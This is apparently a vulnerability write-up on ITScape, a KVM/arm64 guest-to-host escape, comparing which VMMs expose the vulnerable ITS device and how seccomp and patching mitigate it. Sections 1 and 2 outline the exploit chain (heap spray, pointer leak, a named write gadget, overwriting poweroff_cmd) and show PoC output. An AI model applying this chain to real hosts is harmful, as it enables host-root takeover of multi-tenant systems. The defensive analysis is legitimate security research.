
When the bug is real but the path isn't: ITScape (CVE-2026-46316) and the case for minimal runtimes

CVE-2026-46316 ("ITScape"). Reported by Hyunwoo Kim (@v4bel). This post discusses the vulnerability and its mitigations at a conceptual level using already-public information: no gadget offsets, no heap-spray primitives beyond what the author's own write-up discloses.


TL;DR

ITScape is the first publicly documented guest-to-host escape on KVM/arm64. It abuses a race condition in the in-kernel vGIC-ITS emulation to reach host-kernel code execution from inside an unprivileged guest. We reproduced it on a Jetson AGX Orin running kernel v7.1-rc6.

The defensive story is more nuanced and more honest than "unikernels are safe":

  • urunc is safe by default: urunc's seccomp filter blocks KVM_CREATE_DEVICE for the ITS type before the virtual GIC ITS object is ever created. To prove this is the active mechanism, we deliberately stripped that filter and confirmed that the ITS becomes reachable immediately. Once the ITS is reachable, so is the vulnerable code path.
  • Every other VMM we tested exposes GIC ITS: QEMU (-M virt), Cloud Hypervisor v41.0.0, Dragonball (kata runtime-rs), Firecracker ≥ v1.13.0, Kata-QEMU, and Kata-Firecracker ≥ v1.13.0 all create the ITS device unconditionally. The IIDR read confirms 0x4b00043b in each case.
  • Firecracker ≤ v1.12.1 is the one architectural exception: that codebase contains zero ITS-related symbols. From v1.13.0 onward, PR #5364 introduced ITS unconditionally as a PCIe prerequisite, without a CHANGELOG entry.

The broader lesson is sharper than "minimal runtimes are safe": every modern VMM on aarch64 now exposes GIC ITS. urunc's seccomp filter is the only runtime default that blocks the attack surface. That filter is operational, not architectural: one config change away from exposure. Firecracker ≤ v1.12.1 is the only VMM where the absence is structural.


1. The vulnerability

ITScape is a race condition in the in-kernel KVM arm64 interrupt controller emulation, specifically in vgic_its_invalidate_cache() combined with vgic_its_process_commands() in arch/arm64/kvm/vgic/. A guest with EL1 (kernel) privilege drives the virtual GIC ITS via MMIO; two concurrent accesses to the same vgic_irq refcount produce a double-put, leading to a use-after-free on a kmalloc-96 object in the host kernel.

What makes it notable:

  • In-kernel KVM, not QEMU. Most published VM escapes are bugs in the userspace device model and grant at most QEMU-process privileges. ITScape runs in the host kernel's context; success is a full host-kernel compromise.
  • Guest-driven. No host-side action is needed; the guest triggers it through ordinary MMIO writes.
  • arm64-specific. The bug is in arch/arm64/kvm/vgic/. x86 is unaffected.
  • Affected range: 8201d1028caa (2024-04-25) → 13031fb6b835 (2026-06-05, the fix).

The full exploit chain on v7.1-rc6 with nokaslr on the Jetson AGX Orin:

  1. Race INT commands vs GICR_CTLR.EnableLPIs toggle → double-put on vgic_irq → UAF
  2. 64 MB guest_memfd cross-cache spray reclaims freed kmalloc-96 slot with a fake vgic_irq
  3. Leak target_vcpu pointer from fake object → kimage_voffset = 0x0 (nokaslr)
  4. Arbitrary write via ed_deschedule+0xf4 gadget: ldr x0,[x1,#32]; cbz; ldr x1,[x1,#40]; str x1,[x0,#40]; ret
  5. Overwrite poweroff_cmd = "/bin/touch /ITScape" and arp_tbl.gc_work.func = orderly_poweroff
  6. Neigh-GC timer fires → orderly_poweroff() → usermode helper runs /bin/touch /ITScape as uid=0 on the host

The race at the heart of the bug looks like this in the host kernel:

/* Thread A (guest INT command handler) */
irq = vgic_its_check_cache(its, device_id, event_id);
vgic_put_irq(kvm, irq);          // refcount--; may reach 0 -> kfree()
 
/* Thread B (guest GICR_CTLR.EnableLPIs toggle) */
vgic_its_invalidate_cache(its);  // iterates cache, calls vgic_put_irq()
    vgic_put_irq(kvm, irq);      // second put on same object -> UAF

Both threads are driven by ordinary guest MMIO writes with no host-side action required. The freed kmalloc-96 object is then reclaimed via a cross-cache spray from guest_memfd, giving the attacker a controlled fake vgic_irq in host-kernel memory.
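To make the double-put concrete, here is a deterministic, single-threaded userspace model of the interleaving described above. It is a sketch, not kernel code: struct model_irq, model_put() and replay_double_put() are hypothetical names we introduce for illustration, and the real race depends on timing that this replay simply hard-codes.

```c
#include <stdbool.h>

/* Hypothetical stand-in for a refcounted kernel object such as vgic_irq. */
struct model_irq {
    int  refcount;  /* number of live references */
    bool freed;     /* set once the last reference has been dropped */
};

enum put_result { PUT_OK, PUT_FREED, PUT_UNDERFLOW };

/* Drop one reference. Reports when the drop frees the object, and when it
 * lands on an object that is already dead (the use-after-free case). */
enum put_result model_put(struct model_irq *irq)
{
    if (irq->freed || irq->refcount <= 0)
        return PUT_UNDERFLOW;   /* second put on a dead object */
    if (--irq->refcount == 0) {
        irq->freed = true;      /* the kernel would kfree() here */
        return PUT_FREED;
    }
    return PUT_OK;
}

/* Replay the bad interleaving: a single reference exists, and both paths
 * believe that reference is theirs to drop. */
enum put_result replay_double_put(void)
{
    struct model_irq irq = { .refcount = 1, .freed = false };

    (void)model_put(&irq);      /* path A: INT command handler */
    return model_put(&irq);     /* path B: cache invalidation */
}
```

In this model the second put is detected and reported. In the host kernel there is no such guard at the point of the race, which is why the freed slot can be reclaimed by attacker-controlled data.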

Figure 1: the full chain from guest MMIO writes to host-root UMH execution


2. Reproduction on Jetson AGX Orin

Platform: Jetson AGX Orin · kernel v7.1-rc6 · GCC 11.4 · nokaslr · GICv3+GIC-600 hardware

The itscape:latest container image is a FROM scratch image carrying three binaries: guest_exploit (the in-guest ITS trigger), host_exploit (the full KVM-selftest PoC), and the exploit kernel Image. It is built with GCC 13 inside an Ubuntu 22.04 builder stage. GCC 13 is required for the specific ed_deschedule+0xf4 gadget codegen. Kernel addresses are patched at build time by patch_addresses.py for the v7.1-rc6 / GCC 11.4 / nokaslr build.

The guest-side trigger (guest_exploit.c) maps the ITS and GICR MMIO regions via /dev/mem (requiring CONFIG_STRICT_DEVMEM=n in the guest kernel), reads the ITS IIDR register to confirm ITS presence, initialises the ITS command queue and redistributor LPI tables, creates 64 devices × 32 events (2048 LPIs), and then races two threads: one issuing INT commands, the other toggling GICR_CTLR.EnableLPIs. The guest kernel is booted with irqchip.gicv3_nolpi=1 to prevent the in-guest GIC driver from claiming the ITS before the exploit can.

Scenario 1: Direct KVM PoC (/ITScape created as root)

$ sudo /home/ananos/ITScape/poc
Random seed: 0x11355329
=== vgic_its_guest_escape vcpus=4 dev=128 ev=1024 uid=0 ===
[*] exploit running - waiting for the host kernel to create /ITScape as root (up to ~150s)...
cross-cache fill across 64 MB gmem
leak: MOVI vcpu0 leak (gmem irq target_vcpu@48 <- real vcpu0)
leak: gmem+48 = 0xffff0000d8002340 (real vcpu0 kernel pointer)
ISO-LEAK: V=0xffff0000d8002340 target_vcpu=0xffff0000d80025e0
cpuid2 image ptr 0xffff800080092d38 -> kimage_voffset 0x0
cpuid3 image ptr 0xffff800080092d38 -> kimage_voffset 0x0
cpuid1 image ptr 0xffff800080092d38 -> kimage_voffset 0x0
ops landing = 0xffff0000cd3a6060, gadget = 0xffff800080de01b8
WWW done (poweroff_cmd + orderly_poweroff planted); waiting for neigh-gc UMH

[+] /ITScape created by the host kernel (owner uid=0). verify:  ls -la /ITScape

$ ls -la /ITScape
-rw-r--r-- 1 root root 0 Jun 11 20:38 /ITScape
$ id
uid=1000(ananos) gid=1000(ananos) [...]

The file is owned by root. The process that triggered it was the host kernel's usermode helper. The user running the PoC was uid=1000.


3. The actual protection mechanism: what stops it

The ITS IIDR as a canary

guest_exploit.c reads the ITS IIDR register as its very first action after mapping the MMIO:

uint32_t iidr = readl_its(0x0004);
if (iidr == 0 || iidr == 0xFFFFFFFF) {
    printf("[-] ITS not accessible (IIDR=0x%x). No ITS in this VM → safe.\n", iidr);
    return 1;
}
printf("[*] ITS IIDR: 0x%08x (ITS present)\n", iidr);

IIDR = 0x0 means the host kernel never created the vgic_its object. IIDR = 0x4b00043b means it did. This single register read is the dividing line between every safe and unsafe scenario in the table below.
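The value 0x4b00043b is not arbitrary, and decoding it helps when reading logs. The sketch below assumes the GITS_IIDR field layout from the GICv3 architecture specification (ProductID in bits [31:24], Revision in [15:12], Implementer in [11:0]); the macro and function names are ours, not taken from guest_exploit.c.

```c
#include <stdbool.h>
#include <stdint.h>

/* GITS_IIDR field layout, assumed from the GICv3 architecture spec. */
#define IIDR_PRODUCT_ID(v)   (((v) >> 24) & 0xffu)   /* bits [31:24] */
#define IIDR_REVISION(v)     (((v) >> 12) & 0xfu)    /* bits [15:12] */
#define IIDR_IMPLEMENTER(v)  ((v) & 0xfffu)          /* bits [11:0]  */

/* Same test guest_exploit.c applies: all-zeros or all-ones means nothing
 * is answering at the ITS register frame. */
bool its_present(uint32_t iidr)
{
    return iidr != 0 && iidr != 0xFFFFFFFFu;
}

/* True when the value carries ProductID 0x4b (ASCII 'K') and Implementer
 * 0x43b (Arm), the combination seen in this post's 0x4b00043b readings. */
bool iidr_looks_like_kvm_vits(uint32_t iidr)
{
    return IIDR_PRODUCT_ID(iidr) == 0x4b && IIDR_IMPLEMENTER(iidr) == 0x43b;
}
```

A reading that passes its_present() but fails iidr_looks_like_kvm_vits() would suggest something other than the in-kernel emulated ITS is answering, which is worth investigating rather than treating as safe.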

The vgic_its object only exists if someone called ioctl(vmfd, KVM_CREATE_DEVICE, .type=KVM_DEV_TYPE_ARM_VGIC_ITS). Every protection in the table below reduces to one question: was that ioctl allowed to complete?
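For readers who have not seen that ioctl, a minimal host-side sketch follows. It uses the KVM_CREATE_DEVICE_TEST flag, which the KVM API documents as only testing whether the device type is supported, so nothing is instantiated. The function name is hypothetical, and vmfd is assumed to be a VM file descriptor obtained from KVM_CREATE_VM.

```c
#include <linux/kvm.h>
#include <sys/ioctl.h>

/* Returns 1 if the host kernel reports the ITS device type as supported,
 * 0 otherwise (including when vmfd is not a valid VM descriptor).
 * KVM_CREATE_DEVICE_TEST only validates the type: no vgic_its object is
 * created, and a positive answer says nothing about whether a particular
 * VMM actually creates one. */
int its_device_type_supported(int vmfd)
{
    struct kvm_create_device cd = {
        .type  = KVM_DEV_TYPE_ARM_VGIC_ITS,
        .flags = KVM_CREATE_DEVICE_TEST,
    };

    return ioctl(vmfd, KVM_CREATE_DEVICE, &cd) == 0 ? 1 : 0;
}
```

Dropping the TEST flag from the same call is what a VMM does when it really creates the ITS, and that is the call every protection discussed here has to stop.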

Scenario 2: urunc stock (ITS blocked)

$ sudo nerdctl run --runtime io.containerd.urunc.v2 --rm itscape:latest

============================================
  CVE-2026-46316 guest-to-host ITS trigger
============================================

[*] ITS  base: 0x8080000
[*] GICR base: 0x80a0000
[*] ITS  mapped at 0xffffa2426000
[*] GICR mapped at 0xffffa2406000
[-] ITS not accessible (IIDR=0x0). No ITS in this VM → safe.

Why: urunc passes --sandbox on,obsolete=deny,elevateprivileges=deny,spawn=deny,resourcecontrol=deny to QEMU, which applies a seccomp filter to the QEMU process. KVM_CREATE_DEVICE for KVM_DEV_TYPE_ARM_VGIC_ITS is a blocked syscall path. The vgic_its object is never created. Machine type: still -M virt (GICv3+ITS capable). The hardware hasn't changed. The protection is the syscall filter.

Scenario 3: urunc with seccomp deliberately removed (ITS exposed)

To confirm that the seccomp filter is the active protection mechanism (not QEMU's machine type, not the hardware, not anything else), we stripped it from urunc with a one-line change in pkg/unikontainers/hypervisors/qemu.go. This is a deliberate proof-by-removal experiment, not a realistic deployment scenario:

-    if args.Seccomp {
+    if false && args.Seccomp { // seccomp disabled for testing

$ sudo nerdctl run --runtime io.containerd.urunc.v2 --rm itscape:latest

============================================
  CVE-2026-46316 guest-to-host ITS trigger
============================================

[*] ITS  base: 0x8080000
[*] ITS  mapped at 0xffffb0d9b000
[*] GICR mapped at 0xffffb0d7b000
[*] ITS IIDR: 0x4b00043b (ITS present)
[*] ITS enabled: CTLR=0x80000001 CBASER=0x9800000042f10780
[*] LPIs enabled on GICR: CTLR=0x7
[*] Mapped 64 devices × 32 events = 2048 LPIs
[*] Starting race (2000000 iterations)...

Disabling one if, and nothing else, brings the full race into reach. Everything else is identical: same QEMU binary, same -M virt machine type, same host kernel, same hardware. The only variable is whether urunc's existing seccomp filter is in effect. With the filter gone, the vGIC-ITS UAF path is live and, combined with the full chain from Scenario 1, reaches host root. The seccomp filter is therefore the mechanism, not a coincidence of configuration.

Figure 2: same QEMU, same -M virt, same hardware. Only the seccomp filter changes. Safe vs. vulnerable is decided at the syscall boundary.


4. Runtime comparison

| Runtime | Hypervisor | ITS seccomp blocked? | ITS in binary? | IIDR | CVE-2026-46316 | Evidence |
|---|---|---|---|---|---|---|
| Direct KVM (poc.c) | KVM API | N/A | N/A | 0x4b00043b | ⚠️ VULNERABLE | /ITScape created |
| urunc stock | QEMU | Yes (urunc --sandbox) | Yes | 0x0 | 🛡️ SAFE | IIDR=0x0 observed |
| urunc (seccomp removed, proof-of-mechanism) | QEMU | No (filter deliberately stripped) | Yes | 0x4b00043b | ⚠️ VULNERABLE | IIDR=0x4b00043b, race live |
| Kata-QEMU | QEMU 9.1.2 (kata-static) | No | Yes | 0x4b00043b | ⚠️ VULNERABLE | ✓ ITS in guest dmesg |
| Kata-Firecracker (≤ v1.12.1) | Firecracker ≤ v1.12.1 | N/A | No | 0x0 | 🛡️ SAFE | ✓ zero ITS symbols in binary |
| Kata-Firecracker (≥ v1.13.0) | Firecracker ≥ v1.13.0 | N/A | Yes | 0x4b00043b | ⚠️ VULNERABLE | IIDR=0x4b00043b observed |
| Firecracker ≤ v1.12.1 | Firecracker ≤ v1.12.1 | N/A | No | 0x0 | 🛡️ SAFE | ✓ zero ITS symbols in binary |
| Firecracker ≥ v1.13.0 | Firecracker ≥ v1.13.0 | N/A | Yes | 0x4b00043b | ⚠️ VULNERABLE | IIDR=0x4b00043b, race confirmed |
| Cloud Hypervisor v41.0.0 | Cloud Hypervisor | N/A | Yes | 0x4b00043b | ⚠️ VULNERABLE | IIDR=0x4b00043b, race confirmed |
| Dragonball (kata runtime-rs) | Dragonball | N/A | Yes | 0x4b00043b | ⚠️ VULNERABLE | ✓ 2 ITS devices in guest dmesg |

The pattern is unambiguous: every modern VMM on aarch64 exposes GIC ITS. For all QEMU-based stacks and Dragonball, the only thing preventing ITS creation is an external policy. Through v1.12.1, Firecracker was the sole exception: strings over the binary returned zero matches for GITS, vgic_its, or KVM_DEV_TYPE_ARM_VGIC_ITS. That changed with PR #5364, merged 2025-08-12 and shipped in v1.13.0 (2025-08-28). urunc stock is the only runtime in this table where the ITS is blocked by default, and that protection is a seccomp filter, not an absence of code.


5. VMM coverage: the broader picture

Kata-QEMU and Kata-Firecracker ≥ v1.13.0 are vulnerable for the same reasons as standalone QEMU and Firecracker. But the finding goes further: every other VMM we tested on aarch64 also exposes GIC ITS.

Kata's configuration-qemu.toml sets machine_type = "virt" and does not apply an equivalent of urunc's --sandbox seccomp profile. The GICv3+ITS is created exactly as in a direct KVM call. The Kata guest kernel enumerates and fully initialises the ITS at boot, visible in dmesg from /opt/kata/bin/qemu-system-aarch64 (QEMU 9.1.2, kata-static) with -machine virt -enable-kvm:

[    0.000000] GICv3: GICv3 features: 16 PPIs, DirectLPI
[    0.000000] ITS [mem 0x08080000-0x0809ffff]
[    0.000000] ITS@0x0000000008080000: allocated 8192 Devices @41440000 (indirect, esz 8, psz 64K, shr 1)
[    0.000000] ITS@0x0000000008080000: allocated 8192 Interrupt Collections @41450000 (flat, esz 8, psz 64K, shr 1)
[    0.000000] GICv3: using LPI property table @0x0000000041460000

The ITS device, collection tables, and LPI property table are all live before any workload starts. The vgic_its_invalidate_cache() race path is fully reachable. Kata-QEMU on an unpatched arm64 host is vulnerable to ITScape.

For Firecracker ≤ v1.12.1 (and Kata-Firecracker running that version), the answer was architectural: a strings pass returned zero matches for GITS, vgic_its, or KVM_DEV_TYPE_ARM_VGIC_ITS. Firecracker provisioned a GICv3 distributor and redistributor for SPI/SGI/PPI delivery, but the ITS code path simply did not exist and could not be re-enabled by any configuration change.
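The strings pass is easy to reproduce programmatically. The sketch below scans an in-memory copy of a binary for the same three markers; the function names are hypothetical, and loading the file into a buffer is left to the caller. As with strings, a zero count is evidence of absence only for code that carries these identifiers as literal text.

```c
#include <stddef.h>
#include <string.h>

/* Marker strings taken from the strings check described above. */
static const char *const its_markers[] = {
    "GITS", "vgic_its", "KVM_DEV_TYPE_ARM_VGIC_ITS",
};

/* Count occurrences of needle in an arbitrary byte buffer. The buffer may
 * contain NUL bytes, so memcmp is used instead of strstr. */
size_t count_occurrences(const unsigned char *buf, size_t len,
                         const char *needle)
{
    size_t n = strlen(needle), hits = 0;

    if (n == 0 || len < n)
        return 0;
    for (size_t i = 0; i + n <= len; i++)
        if (memcmp(buf + i, needle, n) == 0)
            hits++;
    return hits;
}

/* Total hits across all ITS markers; 0 corresponds to "zero ITS symbols". */
size_t count_its_markers(const unsigned char *buf, size_t len)
{
    size_t total = 0;

    for (size_t m = 0; m < sizeof its_markers / sizeof its_markers[0]; m++)
        total += count_occurrences(buf, len, its_markers[m]);
    return total;
}
```

A check like this fits naturally in a release pipeline: a count that moves from zero to non-zero between two VMM versions is exactly the kind of change that went unannounced here.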

Firecracker v1.13.0 changes the picture. PR #5364 ("Add PCI support on Firecracker", merged 2025-08-12) introduced ITS support via commit 3b943af0 ("arm: support MSI-X on ARM") as a prerequisite for PCIe/MSI-X on aarch64. From that release onward, GICv3::create() unconditionally calls init_its(), which issues KVM_CREATE_DEVICE { type: KVM_DEV_TYPE_ARM_VGIC_ITS }. The guest observes IIDR = 0x4b00043b. The attack surface is identical to standard QEMU on -M virt. What makes this particularly sharp: the change was not flagged in the CVE advisory, the v1.13.0 release notes, or the CHANGELOG. Operators who upgraded Firecracker for PCIe support acquired ITS exposure without being told. Kata-Firecracker deployments running v1.13.0 or later are in the same position as Kata-QEMU.

Cloud Hypervisor v41.0.0 also exposes the ITS unconditionally:

[*] ITS  base: 0x8f90000
[*] GICR base: 0x8fb0000
[*] ITS IIDR: 0x4b00043b (ITS present)
[*] ITS enabled: CTLR=0x80000001 CBASER=0x9800000043210780
[*] LPIs enabled on GICR: CTLR=0x7
[*] Mapped 64 devices × 32 events = 2048 LPIs
[*] Starting race (200000 iterations)...
[*] Race complete. Check host dmesg for: 'refcount_t: underflow; use-after-free'

Dragonball (the embedded VMM used by Kata's runtime-rs, io.containerd.kata-rs.v2) exposes two ITS devices, confirmed by guest dmesg:

[    0.000000] ITS [mem 0x3ffb0000-0x3ffcffff]
[    0.000000] ITS@0x000000003ffb0000: allocated 8192 Devices (indirect, esz 8, psz 64K, shr 1)
[    0.000000] ITS@0x000000003ffb0000: allocated 8192 Interrupt Collections (flat, esz 8)
[    0.000000] ITS [mem 0x3ff90000-0x3ffaffff]
[    0.000000] ITS@0x000000003ff90000: allocated 8192 Devices (indirect, esz 8, psz 64K, shr 1)

Dragonball calls KVM_CREATE_DEVICE for the ITS unconditionally (confirmed by binary: struct Gicv3ItsState and gic-v3-its device strings in the embedded VMM). Two ITS instances means two independent races reachable from the guest.
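Counting ITS instances from a guest dmesg capture can be automated. This is a minimal sketch that assumes the "ITS [mem 0x...-0x...]" line format shown in the logs above; count_its_regions() is a hypothetical helper, and it only works when the guest kernel's GIC driver is allowed to probe the ITS.

```c
#include <stddef.h>
#include <string.h>

/* Count lines of the form "ITS [mem 0x...-0x...]" in a dmesg capture.
 * The per-ITS "ITS@0x..." allocation lines are deliberately not counted,
 * so each ITS instance contributes exactly one hit. */
size_t count_its_regions(const char *dmesg)
{
    static const char tag[] = "ITS [mem 0x";
    size_t count = 0;

    for (const char *p = strstr(dmesg, tag); p != NULL;
         p = strstr(p + sizeof tag - 1, tag))
        count++;
    return count;
}
```

Fed the Dragonball excerpt above it reports two regions, and one for the Kata-QEMU excerpt. A result of zero is weaker evidence than an IIDR read, because a guest kernel built or booted without ITS support prints nothing even when the device exists.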

One structural note: Kata's entire security premise is the KVM isolation boundary. ITScape is a bug in that boundary itself (in host-kernel code, not in the userspace device model). When the ITS path is reachable, this is precisely the class of bug that defeats Kata's core guarantee. The workload in a Kata pod runs at EL0 (userspace inside the guest), so an attacker would need to chain a guest-kernel LPE to EL1 before ITScape applies. That is a real additional hurdle. But in a deployment where the tenant supplies their own kernel image (as in urunc's serverless target), that hurdle is gone by construction.

Figure 3: Kata's three hypervisor lanes, with the urunc-vs-Kata-QEMU contrast in the footer.


6. Reachability and defense-in-depth

Figure 4: every path to vgic_its_invalidate_cache() from the left (direct KVM, Kata-QEMU, urunc-patched), and every cut path from the right (urunc-stock via seccomp, Firecracker-based via no-ITS codebase). The patch (13031fb6b835) removes the bug from the function itself, orthogonal to all of the above.

The key distinction, stated precisely:

  • Seccomp (urunc stock): a policy-enforcement mechanism. Correct by default, revocable by a one-line config change in urunc itself. It protects deployments in which the operator controls the VMM invocation. It does not protect against a tenant who can modify the seccomp profile or bypass it through another route.
  • No ITS in codebase (Firecracker ≤ v1.12.1): an architectural property. Not a policy; not a config; not revocable without modifying and rebuilding the VMM. Protects even if all other layers are misconfigured. This no longer applies from v1.13.0 onward, where ITS arrived silently as a PCIe prerequisite.
  • Patch (13031fb6b835): removes the bug itself. Independent of reachability. Should be applied regardless.

These are three layers that address three different threat models. Defense in depth means using all three where possible. On arm64 today: patch the host; recognise that every modern VMM exposes ITS by default, so the seccomp filter (or version pin to FC ≤ v1.12.1) is not optional; and confirm IIDR=0x0 from inside the guest as a runtime check: it is the only definitive signal regardless of what you believe about your VMM configuration or version.


7. Honest caveats

urunc's protection is operational, not architectural. This is the most important correction from the original framing. The safety of urunc stock comes from urunc's own configuration, specifically one argument group it passes to QEMU. That is real, meaningful protection for the common deployment path. But it is not the same strength as "Firecracker's binary has no ITS code."

Firecracker's no-ITS guarantee is version-gated, and the boundary arrived without announcement. Through v1.12.1, the architectural argument holds cleanly: zero ITS symbols, no call path. From v1.13.0 onward (released 2025-08-28), ITS support was added as an implementation detail of PR #5364 ("Add PCI support on Firecracker"); commit 3b943af0 introduced init_its() as a prerequisite for MSI-X on aarch64. It was not flagged in the CVE advisory, the v1.13.0 release notes, or the CHANGELOG. Operators who upgraded for PCIe support silently acquired ITS exposure. If you are relying on Firecracker's architectural posture, pin to ≤ v1.12.1 or verify IIDR=0x0 at runtime regardless of version.

The Firecracker jailer does not mitigate this. The jailer applies a seccomp BPF filter to the Firecracker process, but a seccomp filter sees only the syscall number and the raw argument values; it cannot dereference pointers. KVM_CREATE_DEVICE is an ioctl whose device type sits inside a struct passed by pointer, and that ioctl must remain allowed for normal Firecracker operation (the vGIC itself is created the same way). The filter therefore cannot distinguish ioctl(fd, KVM_CREATE_DEVICE, {.type=KVM_DEV_TYPE_ARM_VGIC_ITS}) from a KVM_CREATE_DEVICE call for any other device type. On Firecracker ≥ v1.13.0, init_its() is called unconditionally before any guest code runs. The jailer is in place, and the ITS is still created.
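The limitation can be shown with a small model of what a seccomp filter is given to work with. This is a sketch, not an installable BPF program: filter_would_block() is a hypothetical function that uses only fields of struct seccomp_data, which is all the kernel hands to a filter. The ioctl request number is visible in args[1], but args[2] is merely the userspace address of struct kvm_create_device, not its contents.

```c
#include <linux/kvm.h>
#include <linux/seccomp.h>
#include <stdbool.h>
#include <stdint.h>
#include <sys/syscall.h>

/* Model of a decision a seccomp filter could make for this ioctl. The only
 * inputs are fields of struct seccomp_data. args[2] holds a pointer value,
 * so the .type field behind it is out of reach. */
bool filter_would_block(const struct seccomp_data *sd)
{
    return sd->nr == SYS_ioctl &&
           (uint32_t)sd->args[1] == KVM_CREATE_DEVICE;
}
```

Under this model a rule keyed on KVM_CREATE_DEVICE treats an ITS request and a vGIC request identically: it blocks both or allows both. Telling them apart needs a mechanism that can read the struct, or a VMM that never issues the ITS request in the first place.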

The ITS is not the only host-kernel surface a guest can reach. Patching removes this specific bug. Removing the ITS removes this specific path. The KVM core, the PSCI/hypercall surface, the virtio-mmio device emulation, and the monitor process itself all remain. A different bug in a feature the guest does use would not be helped by any of the above.

kconfig is not a host protection in multi-tenant deployments. If the tenant controls the guest kernel image, they control EL1, and they can re-enable CONFIG_ARM_GIC_V3_ITS in their own build. Stripping ITS from the guest kernel kconfig only defends the host when the operator also controls the guest image.

Verify, don't assume. The IIDR read is a one-liner that can be built into any container health check or CI gate. If IIDR != 0x0, the ITS is present regardless of what you believe about your seccomp configuration.
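A health-check version of that read might look like the sketch below. It follows the approach the post describes for guest_exploit.c (mapping the ITS frame through /dev/mem and reading offset 0x0004), but the function names are hypothetical, the ITS base address is VMM-specific (0x8080000 in the QEMU runs above), and it assumes a guest where /dev/mem access to that range is permitted.

```c
#include <fcntl.h>
#include <stdint.h>
#include <sys/mman.h>
#include <unistd.h>

#define GITS_IIDR_OFFSET 0x0004  /* register offset read by guest_exploit.c */

/* Read GITS_IIDR through a physical-memory device such as /dev/mem.
 * its_base is VMM-specific and must be page-aligned. Returns 0 on success
 * and -1 if the region cannot be opened or mapped. */
int read_its_iidr(const char *mem_path, off_t its_base, uint32_t *iidr)
{
    int fd = open(mem_path, O_RDONLY | O_SYNC);
    if (fd < 0)
        return -1;

    long page = sysconf(_SC_PAGESIZE);
    void *map = mmap(NULL, (size_t)page, PROT_READ, MAP_SHARED, fd, its_base);
    close(fd);  /* the mapping stays valid after the descriptor is closed */
    if (map == MAP_FAILED)
        return -1;

    *iidr = *(volatile uint32_t *)((volatile char *)map + GITS_IIDR_OFFSET);
    munmap(map, (size_t)page);
    return 0;
}

/* Gate policy: status 0 only when no ITS answers at the probed address. */
int its_gate_status(uint32_t iidr)
{
    return (iidr == 0 || iidr == 0xFFFFFFFFu) ? 0 : 1;
}
```

A CI gate would call read_its_iidr("/dev/mem", 0x8080000, &v) and exit with its_gate_status(v), treating a failed read as inconclusive rather than as a pass.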


8. Conclusion

ITScape demonstrates that arm64 KVM hosts carry in-kernel, guest-reachable surface that can reach host-kernel privilege without passing through the userspace device model at all. The fix is commit 13031fb6b835. The complementary finding is blunter than we expected: every modern VMM on aarch64 (QEMU, Cloud Hypervisor, Dragonball, Firecracker ≥ v1.13.0) exposes GIC ITS unconditionally. The only runtime that blocks it by default is urunc, through a seccomp filter.

The honest version of the "minimal runtime" argument has to account for this: the question is not which VMM you run, but whether KVM_CREATE_DEVICE for the ITS type is ever allowed to complete. urunc's seccomp posture is the correct default and it works, but it is one filtered syscall away from exposure. Firecracker ≤ v1.12.1 is the only VMM where that absence is structural rather than policy-based, and that guarantee ended with v1.13.0, without a changelog entry. Knowing which layer is doing the work, and which version holds the guarantee, tells you exactly where to focus your hardening, your auditing, and your regression tests.

Apply the patch. Verify IIDR=0x0. Treat the ITS as present unless you have confirmed evidence otherwise.

